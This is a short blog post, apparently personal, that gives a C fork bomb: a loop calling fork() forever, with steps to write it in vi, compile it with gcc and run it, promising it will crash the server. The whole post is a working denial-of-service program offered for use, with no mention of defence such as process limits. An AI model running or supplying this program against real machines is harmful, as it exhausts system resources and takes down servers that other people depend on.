This is very simple C program, if executed, will defenately crash the server
Open Vi editor and type/copy the following lines
main()
{
while(1)
{
fork();
}
}
Save the file with any name, something like ... crash.c
Compile it: gcc crash.c
run it: ./a.out
And see how your server is getting crash.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment